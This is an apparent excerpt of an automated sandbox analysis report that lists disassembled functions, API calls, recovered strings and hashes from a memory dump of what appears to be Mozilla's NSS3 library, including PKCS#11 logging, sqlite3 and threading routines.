Part of subcall function 6C7009D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C700A9D
Part of subcall function 6C7009D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C700AC8
Part of subcall function 6C7009D0: PR_vsmprintf.NSS3(?,?), ref: 6C700AE8
Part of subcall function 6C7009D0: EnterCriticalSection.KERNEL32(?), ref: 6C700B19
Part of subcall function 6C7009D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C700B48
Part of subcall function 6C7009D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C700C76
Part of subcall function 6C7009D0: PR_LogFlush.NSS3 ref: 6C700C7E

PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C622D22

Part of subcall function 6C7009D0: OutputDebugStringA.KERNEL32(?), ref: 6C700B88
Part of subcall function 6C7009D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C700C5D
Part of subcall function 6C7009D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C700C8D
Part of subcall function 6C7009D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C700C9C
Part of subcall function 6C7009D0: OutputDebugStringA.KERNEL32(?), ref: 6C700CD1
Part of subcall function 6C7009D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C700CEC
Part of subcall function 6C7009D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C700CFB
Part of subcall function 6C7009D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C700D16
Part of subcall function 6C7009D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C700D26
Part of subcall function 6C7009D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C700D35
Part of subcall function 6C7009D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C700D65
Part of subcall function 6C7009D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C700D70
Part of subcall function 6C7009D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C700D90
Part of subcall function 6C7009D0: free.MOZGLUE(00000000), ref: 6C700D99

PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C622D3B

Part of subcall function 6C7009D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C700BAB
Part of subcall function 6C7009D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C700BBA
Part of subcall function 6C7009D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C700D7E

PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6C622D54

Part of subcall function 6C7009D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C700BCB
Part of subcall function 6C7009D0: EnterCriticalSection.KERNEL32(?), ref: 6C700BDE
Part of subcall function 6C7009D0: OutputDebugStringA.KERNEL32(?), ref: 6C700C16

Strings

pPin = 0x%p, xrefs: 6C622D1D
pLabel = 0x%p, xrefs: 6C622D4F
ulPinLen = %d, xrefs: 6C622D36
C_InitToken, xrefs: 6C622CE7
slotID = 0x%x, xrefs: 6C622D02
npl, xrefs: 6C622D6C, 6C622D9A

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken$npl
API String ID: 420000887-1214842499
Opcode ID: 15bac484cf770fa681e59da9e4c9f95bc299d7dfb5e295835255a921a3488560
Instruction ID: 61b363231b9dfef1397a1be2a95f86fbf22b7360701ba35016622e75a9a03f0a
Opcode Fuzzy Hash: 15bac484cf770fa681e59da9e4c9f95bc299d7dfb5e295835255a921a3488560
Instruction Fuzzy Hash: 5B21F875210144EFEB009F54DE4CA863FF1EB8232DF844831E50893622DF349918CFA2

Function 6C592450 Relevance: 19.2, APIs: 15, Instructions: 440COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C5924BA
LeaveCriticalSection.KERNEL32(?), ref: 6C59250D
EnterCriticalSection.KERNEL32(?), ref: 6C592554
LeaveCriticalSection.KERNEL32(?), ref: 6C5925A7
EnterCriticalSection.KERNEL32(?), ref: 6C592609
LeaveCriticalSection.KERNEL32(?), ref: 6C59265F
EnterCriticalSection.KERNEL32(?), ref: 6C5926A2
LeaveCriticalSection.KERNEL32(?), ref: 6C5926F5
EnterCriticalSection.KERNEL32(?), ref: 6C592764
LeaveCriticalSection.KERNEL32(?), ref: 6C592898
EnterCriticalSection.KERNEL32(?), ref: 6C5928D0
EnterCriticalSection.KERNEL32(?), ref: 6C592948
LeaveCriticalSection.KERNEL32(?), ref: 6C59299B
EnterCriticalSection.KERNEL32(?), ref: 6C5929E2
LeaveCriticalSection.KERNEL32(?), ref: 6C592A31

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: CriticalSection$Enter$Leave
String ID:
API String ID: 2801635615-0
Opcode ID: 957a342ed3ba16cfe86cd036140ed9447f1e92f695e12a2551e9883bd52e14e0
Instruction ID: 05078808e98d112128789eea84ebb1807c860a8bf6c8cf3cafb28bb8fdf8716c
Opcode Fuzzy Hash: 957a342ed3ba16cfe86cd036140ed9447f1e92f695e12a2551e9883bd52e14e0
Instruction Fuzzy Hash: ABF1A531B01254CFDB04EF60DD8DA6A7730BF4732ABA841BED81A57A10DF399941CB92

Function 6C6C2D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C6C2D9F

Part of subcall function 6C57CA30: EnterCriticalSection.KERNEL32(?,?,?,6C5DF9C9,?,6C5DF4DA,6C5DF9C9,?,?,6C5A369A), ref: 6C57CA7A
Part of subcall function 6C57CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C57CB26

sqlite3_exec.NSS3(?,?,6C6C2F70,?,?), ref: 6C6C2DF9
sqlite3_free.NSS3(00000000), ref: 6C6C2E2C
sqlite3_free.NSS3(?), ref: 6C6C2E3A
sqlite3_free.NSS3(?), ref: 6C6C2E52
sqlite3_mprintf.NSS3(6C72AAF9,?), ref: 6C6C2E62
sqlite3_free.NSS3(?), ref: 6C6C2E70
sqlite3_free.NSS3(?), ref: 6C6C2E89
sqlite3_free.NSS3(?), ref: 6C6C2EBB
sqlite3_free.NSS3(?), ref: 6C6C2ECB
sqlite3_free.NSS3(00000000), ref: 6C6C2F3E
sqlite3_free.NSS3(?), ref: 6C6C2F4C

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
String ID:
API String ID: 1957633107-0
Opcode ID: 64a1319b18d8cefe16a077b129d54e32e5cd506a38a3ebc1227e61679c2d0b33
Instruction ID: 42eb180719511b4a2e0724fcae59edbca85f0f256b743077fd5a5c37916ed303
Opcode Fuzzy Hash: 64a1319b18d8cefe16a077b129d54e32e5cd506a38a3ebc1227e61679c2d0b33
Instruction Fuzzy Hash: C1616BB5F012058BEB10CFA8D884B9EB7F1EF99348F145028EC55A7701E735E845CBA6

Function 6C574C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C573921,6C7514E4,6C6BCC70), ref: 6C574C97
EnterCriticalSection.KERNEL32(?,?,?,?,6C573921,6C7514E4,6C6BCC70), ref: 6C574CB0
PR_Unlock.NSS3(?,?,?,?,?,6C573921,6C7514E4,6C6BCC70), ref: 6C574CC9
TlsGetValue.KERNEL32(?,?,?,?,?,6C573921,6C7514E4,6C6BCC70), ref: 6C574D11
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C573921,6C7514E4,6C6BCC70), ref: 6C574D2A
PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C573921,6C7514E4,6C6BCC70), ref: 6C574D4A
PR_Unlock.NSS3(?,?,?,?,?,?,?,6C573921,6C7514E4,6C6BCC70), ref: 6C574D57
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C573921,6C7514E4,6C6BCC70), ref: 6C574D97
PR_Lock.NSS3(?,?,?,?,?,6C573921,6C7514E4,6C6BCC70), ref: 6C574DBA
PR_WaitCondVar.NSS3 ref: 6C574DD4
PR_Unlock.NSS3(?,?,?,?,?,6C573921,6C7514E4,6C6BCC70), ref: 6C574DE6
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C573921,6C7514E4,6C6BCC70), ref: 6C574DEF

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
String ID:
API String ID: 3388019835-0
Opcode ID: 226f50d6ce71338b4dd510fe9795317110e75f725bed6a6519973a2af25678d9
Instruction ID: 8724a286485850a2ab0e915acbaa9705dc6036f157962aa3ab84648f0545e010
Opcode Fuzzy Hash: 226f50d6ce71338b4dd510fe9795317110e75f725bed6a6519973a2af25678d9
Instruction Fuzzy Hash: 87416AB5A04615CFCB10AF78C988559BBB4FF0A319B058A79D8889B750EB30D894CFD5

Function 6C618F70 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 152COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C60DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C618FAF
PR_Now.NSS3(?,?,00000002,?,?,?,6C60DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C618FD1
TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C60DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C618FFA
EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C60DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C619013
PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C60DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C619042
TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C60DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C61905A
EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C60DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C619073
PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C60DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C6190EC

Part of subcall function 6C5E0F00: PR_GetPageSize.NSS3(6C5E0936,FFFFE8AE,?,6C5716B7,00000000,?,6C5E0936,00000000,?,6C57204A), ref: 6C5E0F1B
Part of subcall function 6C5E0F00: PR_NewLogModule.NSS3(clock,6C5E0936,FFFFE8AE,?,6C5716B7,00000000,?,6C5E0936,00000000,?,6C57204A), ref: 6C5E0F25

PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C60DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C619111

Strings

npl, xrefs: 6C6190A3

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValue$InternalK11_ModulePageSizeSlot
String ID: npl
API String ID: 2831689957-3390371981
Opcode ID: 46c34e740af67cd9b9cfa17493a446bcb7dd08224599188025db0e195d0a22b8
Instruction ID: 90588b0e123f8d84bf46167fcace548925d1b0b45c465c379383d0ccda1e8b58
Opcode Fuzzy Hash: 46c34e740af67cd9b9cfa17493a446bcb7dd08224599188025db0e195d0a22b8
Instruction Fuzzy Hash: 26519F74A086158FCF00EF38C488699BBF1BF4A319F4545B9DC449BB15EB31E884CB85

Function 6C614E50 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C614E90
EnterCriticalSection.KERNEL32 ref: 6C614EA9
TlsGetValue.KERNEL32 ref: 6C614EC6
EnterCriticalSection.KERNEL32 ref: 6C614EDF
PL_HashTableLookup.NSS3 ref: 6C614EF8
PR_Unlock.NSS3 ref: 6C614F05
PR_Now.NSS3 ref: 6C614F13
PR_Unlock.NSS3 ref: 6C614F3A

Part of subcall function 6C5E07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C57204A), ref: 6C5E07AD
Part of subcall function 6C5E07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C57204A), ref: 6C5E07CD
Part of subcall function 6C5E07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C57204A), ref: 6C5E07D6
Part of subcall function 6C5E07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C57204A), ref: 6C5E07E4
Part of subcall function 6C5E07A0: TlsSetValue.KERNEL32(00000000,?,6C57204A), ref: 6C5E0864
Part of subcall function 6C5E07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C5E0880
Part of subcall function 6C5E07A0: TlsSetValue.KERNEL32(00000000,?,?,6C57204A), ref: 6C5E08CB
Part of subcall function 6C5E07A0: TlsGetValue.KERNEL32(?,?,6C57204A), ref: 6C5E08D7
Part of subcall function 6C5E07A0: TlsGetValue.KERNEL32(?,?,6C57204A), ref: 6C5E08FB

Strings

bUal, xrefs: 6C614E5C
bUal, xrefs: 6C614F3F

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
String ID: bUal$bUal
API String ID: 326028414-743892444
Opcode ID: fa7ecc10dd1d03e418424df8c22193a486505d4dc9f6057ee8020376b603bb51
Instruction ID: a42e3d047deedf7a954583466dc2642d5c790f6a777731c42c1277659975be74
Opcode Fuzzy Hash: fa7ecc10dd1d03e418424df8c22193a486505d4dc9f6057ee8020376b603bb51
Instruction Fuzzy Hash: 75414AB4A04605DFCB00EF78C4848AABBF0FF89319B018569EC999B711EB30E855CF95

Function 6C626C40 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 87COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestInit), ref: 6C626C66
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C626C94
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C626CA3

Part of subcall function 6C70D930: PL_strncpyz.NSS3(?,?,?), ref: 6C70D963

PR_LogPrint.NSS3(?,00000000), ref: 6C626CB9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C626CD5

Strings

hSession = 0x%x, xrefs: 6C626C7E, 6C626C8E
C_DigestInit, xrefs: 6C626C61
(CK_INVALID_HANDLE), xrefs: 6C626C9C
npl, xrefs: 6C626CF4, 6C626D1F
pMechanism = 0x%p, xrefs: 6C626CD0

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit$npl
API String ID: 1003633598-1410796035
Opcode ID: 694a7cdfcaafbbd4f4e2676a9bacf95692218d7800809307379be3f28c7aa35c
Instruction ID: 1da4517cb01231ad7666ab914141cd9c183b5ca8b02000481de9eefa3bae8aef
Opcode Fuzzy Hash: 694a7cdfcaafbbd4f4e2676a9bacf95692218d7800809307379be3f28c7aa35c
Instruction Fuzzy Hash: 7B21E471B011449BDB00AF559E8DF9B7BB5EB8631CF884035E80997B11DF38D908CB9A

Function 6C63ECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C63DE64), ref: 6C63ED0C
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C63ED22

Part of subcall function 6C64B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7218D0,?), ref: 6C64B095

PL_FreeArenaPool.NSS3(?), ref: 6C63ED4A
PL_FinishArenaPool.NSS3(?), ref: 6C63ED6B
PR_CallOnce.NSS3(6C752AA4,6C6512D0), ref: 6C63ED38

Part of subcall function 6C574C70: TlsGetValue.KERNEL32(?,?,?,6C573921,6C7514E4,6C6BCC70), ref: 6C574C97
Part of subcall function 6C574C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C573921,6C7514E4,6C6BCC70), ref: 6C574CB0
Part of subcall function 6C574C70: PR_Unlock.NSS3(?,?,?,?,?,6C573921,6C7514E4,6C6BCC70), ref: 6C574CC9

SECOID_FindOID_Util.NSS3(?), ref: 6C63ED52
PR_CallOnce.NSS3(6C752AA4,6C6512D0), ref: 6C63ED83
PL_FreeArenaPool.NSS3(?), ref: 6C63ED95
PL_FinishArenaPool.NSS3(?), ref: 6C63ED9D

Part of subcall function 6C6564F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C65127C,00000000,00000000,00000000), ref: 6C65650E

Strings

security, xrefs: 6C63ED06

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
String ID: security
API String ID: 3323615905-3315324353
Opcode ID: d963e470af0d74aac54a3da3be024b0f251a3cf939981c1a8a63696a1a258fc4
Instruction ID: 28b6f300d21f27ecd1acb08fed6d0bd82662fc6c81a31bc60e21c14da027c988
Opcode Fuzzy Hash: d963e470af0d74aac54a3da3be024b0f251a3cf939981c1a8a63696a1a258fc4
Instruction Fuzzy Hash: BA1108759002146BE7115A25AC44BBB72B8AF4270CF906525E81962F41FB25AA28C6FE

Function 6C700EB0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Aborting,?,6C5E2357), ref: 6C700EB8
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C5E2357), ref: 6C700EC0
PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C700EE6

Part of subcall function 6C7009D0: PR_Now.NSS3 ref: 6C700A22
Part of subcall function 6C7009D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C700A35
Part of subcall function 6C7009D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C700A66
Part of subcall function 6C7009D0: PR_GetCurrentThread.NSS3 ref: 6C700A70
Part of subcall function 6C7009D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C700A9D
Part of subcall function 6C7009D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C700AC8
Part of subcall function 6C7009D0: PR_vsmprintf.NSS3(?,?), ref: 6C700AE8
Part of subcall function 6C7009D0: EnterCriticalSection.KERNEL32(?), ref: 6C700B19
Part of subcall function 6C7009D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C700B48
Part of subcall function 6C7009D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C700C76
Part of subcall function 6C7009D0: PR_LogFlush.NSS3 ref: 6C700C7E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C700EFA

Part of subcall function 6C5EAEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C5EAF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C700F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C700F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C700F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C700F2B

Strings

Assertion failure: %s, at %s:%d, xrefs: 6C700ED9, 6C700EE5, 6C700F06, 6C700F0B
Aborting, xrefs: 6C700EB3

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 3905088656-1374795319
Opcode ID: 02b4537bcd802e71b0cc266e67b22916ab470b62cffb780fb6d11d3e3bfff6aa
Instruction ID: 42b28dbc9c2321c7b06f942fc608a38305068cf3ab241b208dc03a3fd1d8405c
Opcode Fuzzy Hash: 02b4537bcd802e71b0cc266e67b22916ab470b62cffb780fb6d11d3e3bfff6aa
Instruction Fuzzy Hash: 74F0AFF59001147BEB003B609C4EC9B3E3DDF86279F048035FD0956602DA36E9189AF2

Function 6C664DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400), ref: 6C664DCB

Part of subcall function 6C650FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5F87ED,00000800,6C5EEF74,00000000), ref: 6C651000
Part of subcall function 6C650FF0: PR_NewLock.NSS3(?,00000800,6C5EEF74,00000000), ref: 6C651016
Part of subcall function 6C650FF0: PL_InitArenaPool.NSS3(00000000,security,6C5F87ED,00000008,?,00000800,6C5EEF74,00000000), ref: 6C65102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6C664DE1

Part of subcall function 6C6510C0: TlsGetValue.KERNEL32(?,6C5F8802,00000000,00000008,?,6C5EEF74,00000000), ref: 6C6510F3
Part of subcall function 6C6510C0: EnterCriticalSection.KERNEL32(?,?,6C5F8802,00000000,00000008,?,6C5EEF74,00000000), ref: 6C65110C
Part of subcall function 6C6510C0: PL_ArenaAllocate.NSS3(?,?,?,6C5F8802,00000000,00000008,?,6C5EEF74,00000000), ref: 6C651141
Part of subcall function 6C6510C0: PR_Unlock.NSS3(?,?,?,6C5F8802,00000000,00000008,?,6C5EEF74,00000000), ref: 6C651182
Part of subcall function 6C6510C0: TlsGetValue.KERNEL32(?,6C5F8802,00000000,00000008,?,6C5EEF74,00000000), ref: 6C65119C

PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6C664DFF
